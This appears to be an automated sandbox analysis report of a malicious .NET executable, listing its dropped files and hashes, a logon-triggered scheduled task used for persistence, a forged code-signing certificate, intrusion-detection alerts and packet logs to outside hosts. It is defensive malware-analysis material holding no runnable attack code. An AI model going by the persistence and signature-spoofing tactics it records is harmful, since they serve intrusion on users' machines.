Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.353332853270839
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Ko84qXKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKoviYHKh3oPtHo6hAHKzeR
MD5:	A4AF0F36EC4E0C69DC0F860C891E8BBE
SHA1:	28DD81A1EDDF71CBCBF86DA986E047279EF097CD
SHA-256:	B038D4342E4DD96217BD90CFE32581FCCB381C5C2E6FF257CD32854F840D1FDE
SHA-512:	A675D3E9DB5BDD325A22E82C6BCDBD5409D7A34453DAAEB0E37206BE982C388547E1BDF22DC70393C69D0CE55635E2364502572C3AD2E6753A56A5C3893F6D69
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379828835936797
Encrypted:	false
SSDEEP:	48:tWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMtUyus:tLHxvCZfIfSKRHmOugras
MD5:	A93AB884EF78F813304E23C88AF12959
SHA1:	423620B9CAA7E7C5D04490B3EEA18016530F90CD
SHA-256:	3FF5E7596B453055A8D0370171BCD69C9DFC33AD3B72FB14EF0A2BA4EAABF0DC
SHA-512:	D25843B847AF722BF8EDBA757543A5A5966BE3344C79658FE06FECFD12D82EC37DA7C5B62B640C17170E81203A58212BF2F50693A6C8E0341E58CC0CB83BD746
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pgnlvtq.fds.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqhztgpy.eme.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1wr02qf.0f0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xic2njdh.pdv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp9B09.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.116117535074896
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtapxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTKv
MD5:	015A23748A4A5AED5FDD8D14A9B7A5A3
SHA1:	810449A369A548FDC82E1BE51E9C0D4EE51E9F60
SHA-256:	5F4D2D17BE7EA74C7F108D29EDC58BC1DFE40B0666A745DB8913D84069909868
SHA-512:	FB3A173DBD5263B97A810D9ADD7507E0844C0E4E45CA7CB66EBA29C598AEC3D5813804D37A56E0AA8F7F20FAD31888D2FAD3773BF3FEED6A5794C6030E633F1C
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpAE14.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1580
Entropy (8bit):	5.116117535074896
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtapxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTKv
MD5:	015A23748A4A5AED5FDD8D14A9B7A5A3
SHA1:	810449A369A548FDC82E1BE51E9C0D4EE51E9F60
SHA-256:	5F4D2D17BE7EA74C7F108D29EDC58BC1DFE40B0666A745DB8913D84069909868
SHA-512:	FB3A173DBD5263B97A810D9ADD7507E0844C0E4E45CA7CB66EBA29C598AEC3D5813804D37A56E0AA8F7F20FAD31888D2FAD3773BF3FEED6A5794C6030E633F1C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	699400
Entropy (8bit):	7.694022030867059
Encrypted:	false
SSDEEP:	12288:iyhgIaOq+Ab2H/gV0m13PRUnCKo4nTCHw1TwEAbIWNn0hxHrVkR:3aByCKbWHw1EEAkha
MD5:	7DFF0DEDCCEB56002189A9CE88CF2236
SHA1:	7323FE3EC4B682F5D84D353FDEC3E66D98E2FEFA
SHA-256:	3CD162FE9F394907E7DAE6C4F342F7859D4EA2D645B24A098CD2CB5A877306F8
SHA-512:	ECAC885CA6632A9EEA74473ED140711C50D236A057B77F8C39B62DB29109D64F74CF2E28A2F671BE3AD5CFB1BE7C4C81344B364711423DF648C203E0E7A49416
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Sng..............0..R..."......~p... ........@.. ....................................@.................................,p..O....................v...6........................................................... ............... ..H............text....P... ...R.................. ..`.rsrc............ ...T..............@..@.reloc...............t..............@..B................`p......H.......8....k......]...x....;..........................................S....qL....O....>...<.#.B.+.A.U..z7.....M7....-......1H...p..F.......O..[......hOg.......P...6~%?...<{l.r&.3...\|(..-,~o..4.1....Q...p.q.(......'..3Xz.dq.v......b%.n.#...~....yUX.jAk.Q..m.r.<.]....G...C...Juy.\|.i>L."....I...U]..o.K..L..."..w.....\e..M 09+.@...xrS..)d\|<N..8dT.....b..4.e.2.{Y.BH.Nq..G...._g!..T.$...o...{.3...... C.W.SW.....rF....J..\|8.. ....^7.^..6.WP......3..R..]6's.G..

C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.694022030867059
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	699'400 bytes
MD5:	7dff0dedcceb56002189a9ce88cf2236
SHA1:	7323fe3ec4b682f5d84d353fdec3e66d98e2fefa
SHA256:	3cd162fe9f394907e7dae6c4f342f7859d4ea2d645b24a098cd2cb5a877306f8
SHA512:	ecac885ca6632a9eea74473ed140711c50d236a057b77f8c39b62db29109d64f74cf2e28a2f671be3ad5cfb1be7c4c81344b364711423df648c203e0e7a49416
SSDEEP:	12288:iyhgIaOq+Ab2H/gV0m13PRUnCKo4nTCHw1TwEAbIWNn0hxHrVkR:3aByCKbWHw1EEAkha
TLSH:	7AE4F1983605F90FC9425F3149B0FEB469381DEA7603D3039EDB6EEFB45EA568E04192
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Sng..............0..R..."......~p... ........@.. ....................................@................................

File Icon


Icon Hash:	7d324a191b1e0515

Static PE Info

General

Entrypoint:	0x4a707e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676E53D0 [Fri Dec 27 07:14:24 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa702c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa8000	0x1ec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa7600	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xaa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa5084	0xa5200	f9f8fe058ea1ca253e70e2eb751c40b1	False	0.8911483961014383	data	7.6955853381681605	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa8000	0x1ec0	0x2000	8b53ed80ea2fe159860e5ee3da36f830	False	0.83984375	data	7.268488929542025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xaa000	0xc	0x200	4ee43cc84230b093e083b75894d180c5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa80e8	0x1af5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9340675264454427
RT_GROUP_ICON	0xa9be0	0x14	data	1.05
RT_VERSION	0xa9bf4	0x2cc	data	0.43156424581005587

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T20:23:56.217464+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-02T20:23:57.358081+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	132.226.247.73	80	TCP
2025-01-02T20:23:57.934299+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-02T20:23:58.733919+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49740	132.226.247.73	80	TCP
2025-01-02T20:24:00.123735+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49743	132.226.247.73	80	TCP
2025-01-02T20:24:01.123756+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49745	132.226.247.73	80	TCP
2025-01-02T20:24:01.934560+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.96.3	443	TCP
2025-01-02T20:24:02.092488+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49745	132.226.247.73	80	TCP
2025-01-02T20:24:02.644950+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49750	188.114.96.3	443	TCP
2025-01-02T20:24:03.405028+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49752	132.226.247.73	80	TCP
2025-01-02T20:24:03.991040+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49754	188.114.96.3	443	TCP
2025-01-02T20:24:05.350440+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49758	188.114.96.3	443	TCP
2025-01-02T20:24:06.760607+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49761	188.114.96.3	443	TCP
2025-01-02T20:24:08.090192+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49763	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:23:55.270766973 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:55.275675058 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:55.277160883 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:55.277374029 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:55.282788038 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:55.959275961 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:55.963427067 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:55.968281031 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:56.173664093 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:56.217463970 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:56.257744074 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.257786989 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:56.257899046 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.264270067 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.264302969 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:56.749102116 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:56.749309063 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.791879892 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.791927099 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:56.792359114 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:56.842478991 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:56.973731995 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.015330076 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.088680983 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.088756084 CET	443	49737	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.088819027 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.095421076 CET	49737	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.102193117 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.106996059 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:57.312096119 CET	80	49736	132.226.247.73	192.168.2.4
Jan 2, 2025 20:23:57.315967083 CET	49738	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.316023111 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.316322088 CET	49738	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.316322088 CET	49738	443	192.168.2.4	188.114.96.3
Jan 2, 2025 20:23:57.316351891 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.358081102 CET	49736	80	192.168.2.4	132.226.247.73
Jan 2, 2025 20:23:57.794442892 CET	443	49738	188.114.96.3	192.168.2.4
Jan 2, 2025 20:23:57.796266079 CET	49738	443	192.168.2.4	188.114.96.3
